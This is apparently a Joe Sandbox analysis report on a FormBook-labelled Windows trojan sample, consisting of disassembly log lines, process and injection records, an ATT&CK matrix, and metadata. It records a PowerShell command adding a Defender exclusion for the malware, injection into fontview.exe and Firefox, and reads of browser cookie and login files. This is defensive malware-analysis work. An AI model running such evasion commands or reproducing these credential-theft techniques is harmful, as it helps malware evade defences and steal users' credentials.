    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA660 mov eax, dword ptr fs:[00000030h]5_2_017DA660
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA660 mov eax, dword ptr fs:[00000030h]5_2_017DA660
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BC640 mov eax, dword ptr fs:[00000030h]5_2_017BC640
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A262C mov eax, dword ptr fs:[00000030h]5_2_017A262C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017BE627 mov eax, dword ptr fs:[00000030h]5_2_017BE627
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D6620 mov eax, dword ptr fs:[00000030h]5_2_017D6620
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D8620 mov eax, dword ptr fs:[00000030h]5_2_017D8620
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2619 mov eax, dword ptr fs:[00000030h]5_2_017E2619
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E6F2 mov eax, dword ptr fs:[00000030h]5_2_0181E6F2
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E6F2 mov eax, dword ptr fs:[00000030h]5_2_0181E6F2
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E6F2 mov eax, dword ptr fs:[00000030h]5_2_0181E6F2
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E6F2 mov eax, dword ptr fs:[00000030h]5_2_0181E6F2
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018206F1 mov eax, dword ptr fs:[00000030h]5_2_018206F1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018206F1 mov eax, dword ptr fs:[00000030h]5_2_018206F1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E609 mov eax, dword ptr fs:[00000030h]5_2_0181E609
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA6C7 mov ebx, dword ptr fs:[00000030h]5_2_017DA6C7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA6C7 mov eax, dword ptr fs:[00000030h]5_2_017DA6C7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D66B0 mov eax, dword ptr fs:[00000030h]5_2_017D66B0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DC6A6 mov eax, dword ptr fs:[00000030h]5_2_017DC6A6
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186866E mov eax, dword ptr fs:[00000030h]5_2_0186866E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186866E mov eax, dword ptr fs:[00000030h]5_2_0186866E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A4690 mov eax, dword ptr fs:[00000030h]5_2_017A4690
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A4690 mov eax, dword ptr fs:[00000030h]5_2_017A4690
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E096E mov eax, dword ptr fs:[00000030h]5_2_017E096E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E096E mov edx, dword ptr fs:[00000030h]5_2_017E096E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E096E mov eax, dword ptr fs:[00000030h]5_2_017E096E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C6962 mov eax, dword ptr fs:[00000030h]5_2_017C6962
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C6962 mov eax, dword ptr fs:[00000030h]5_2_017C6962
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C6962 mov eax, dword ptr fs:[00000030h]5_2_017C6962
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018289B3 mov esi, dword ptr fs:[00000030h]5_2_018289B3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018289B3 mov eax, dword ptr fs:[00000030h]5_2_018289B3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018289B3 mov eax, dword ptr fs:[00000030h]5_2_018289B3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018369C0 mov eax, dword ptr fs:[00000030h]5_2_018369C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0186A9D3 mov eax, dword ptr fs:[00000030h]5_2_0186A9D3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01798918 mov eax, dword ptr fs:[00000030h]5_2_01798918
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01798918 mov eax, dword ptr fs:[00000030h]5_2_01798918
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182E9E0 mov eax, dword ptr fs:[00000030h]5_2_0182E9E0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D29F9 mov eax, dword ptr fs:[00000030h]5_2_017D29F9
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D29F9 mov eax, dword ptr fs:[00000030h]5_2_017D29F9
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E908 mov eax, dword ptr fs:[00000030h]5_2_0181E908
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181E908 mov eax, dword ptr fs:[00000030h]5_2_0181E908
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182C912 mov eax, dword ptr fs:[00000030h]5_2_0182C912
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182892A mov eax, dword ptr fs:[00000030h]5_2_0182892A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0183892B mov eax, dword ptr fs:[00000030h]5_2_0183892B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D49D0 mov eax, dword ptr fs:[00000030h]5_2_017D49D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01820946 mov eax, dword ptr fs:[00000030h]5_2_01820946
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A09AD mov eax, dword ptr fs:[00000030h]5_2_017A09AD
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A09AD mov eax, dword ptr fs:[00000030h]5_2_017A09AD
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe; Memory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe"
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtAllocateVirtualMemory: Direct from: 0x76EF48EC
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtQueryAttributesFile: Direct from: 0x76EF2E6C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtQuerySystemInformation: Direct from: 0x76EF48CC
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtOpenSection: Direct from: 0x76EF2E0C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtDeviceIoControlFile: Direct from: 0x76EF2AEC
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtQueryInformationToken: Direct from: 0x76EF2CAC
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtCreateFile: Direct from: 0x76EF2FEC
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtOpenFile: Direct from: 0x76EF2DCC
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtTerminateThread: Direct from: 0x76EF2FCC
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtOpenKeyEx: Direct from: 0x76EF2B9C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtSetInformationProcess: Direct from: 0x76EF2C5C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtProtectVirtualMemory: Direct from: 0x76EF2F9C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtWriteVirtualMemory: Direct from: 0x76EF2E3C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtNotifyChangeKey: Direct from: 0x76EF3C2C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtCreateMutant: Direct from: 0x76EF35CC
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtResumeThread: Direct from: 0x76EF36AC
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtMapViewOfSection: Direct from: 0x76EF2D1C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtProtectVirtualMemory: Direct from: 0x76EE7B2E
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtQuerySystemInformation: Direct from: 0x76EF2DFC
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtReadFile: Direct from: 0x76EF2ADC
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtDelayExecution: Direct from: 0x76EF2DDC
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtQueryInformationProcess: Direct from: 0x76EF2C26
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtResumeThread: Direct from: 0x76EF2FBC
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtCreateUserProcess: Direct from: 0x76EF371C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtWriteVirtualMemory: Direct from: 0x76EF490C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtSetInformationThread: Direct from: 0x76EE63F9
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtClose: Direct from: 0x76EF2B6C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtSetInformationThread: Direct from: 0x76EF2B4C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtReadVirtualMemory: Direct from: 0x76EF2E8C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; NtCreateKey: Direct from: 0x76EF2C6C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe; Section loaded: NULL target: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe protection: execute and read and write
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe; Section loaded: NULL target: C:\Windows\SysWOW64\fontview.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\fontview.exe; Section loaded: NULL target: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe protection: read write
    Source: C:\Windows\SysWOW64\fontview.exe; Section loaded: NULL target: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\fontview.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
    Source: C:\Windows\SysWOW64\fontview.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\fontview.exe; Thread register set: target process: 1408
    Source: C:\Windows\SysWOW64\fontview.exe; Thread APC queued: target process: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe"
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe; Process created: C:\Users\user\Desktop\Item-RQF-9456786.exe "C:\Users\user\Desktop\Item-RQF-9456786.exe"
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe; Process created: C:\Windows\SysWOW64\fontview.exe "C:\Windows\SysWOW64\fontview.exe"
    Source: C:\Windows\SysWOW64\fontview.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
    Source: LiiDBuNLRIYu.exe, 00000009.00000002.4741491007.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 00000009.00000000.2484893109.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4741742008.0000000000F51000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager
    Source: LiiDBuNLRIYu.exe, 00000009.00000002.4741491007.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 00000009.00000000.2484893109.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4741742008.0000000000F51000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
    Source: LiiDBuNLRIYu.exe, 00000009.00000002.4741491007.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 00000009.00000000.2484893109.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4741742008.0000000000F51000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
    Source: LiiDBuNLRIYu.exe, 00000009.00000002.4741491007.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 00000009.00000000.2484893109.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4741742008.0000000000F51000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    Source: C:\Windows\SysWOW64\fontview.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
    Source: C:\Windows\SysWOW64\fontview.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
    Source: C:\Windows\SysWOW64\fontview.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
    Source: C:\Windows\SysWOW64\fontview.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\fontview.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Windows\SysWOW64\fontview.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
    Source: C:\Windows\SysWOW64\fontview.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
    Source: C:\Windows\SysWOW64\fontview.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
    Source: C:\Windows\SysWOW64\fontview.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
    Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
    [Behavior graph (image not reproduced). Behavior Graph ID: 1555193, Sample: Item-RQF-9456786.exe, Startdate: 13/11/2024, Architecture: WINDOWS, Score: 100]

    Source | Detection | Scanner | Label | Link
    Item-RQF-9456786.exe | 39% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook |
    Item-RQF-9456786.exe | 100% | Joe Sandbox ML | |
    No Antivirus matches
                                                                                high
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://static.minne.com/files/banner/minne_600x500fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1555193
Start date and time: 2024-11-13 15:32:03 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Item-RQF-9456786.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@11/7@18/14
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 81
• Number of non-executed functions: 270
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Item-RQF-9456786.exe
Time      Type             Description
09:33:21  API Interceptor  1x Sleep call for process: Item-RQF-9456786.exe modified
09:33:24  API Interceptor  18x Sleep call for process: powershell.exe modified
09:34:28  API Interceptor  11462952x Sleep call for process: fontview.exe modified
                                                                                  Process:C:\Users\user\Desktop\Item-RQF-9456786.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1216
                                                                                  Entropy (8bit):5.34331486778365
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                  Malicious:true
                                                                                  Reputation:high, very likely benign file
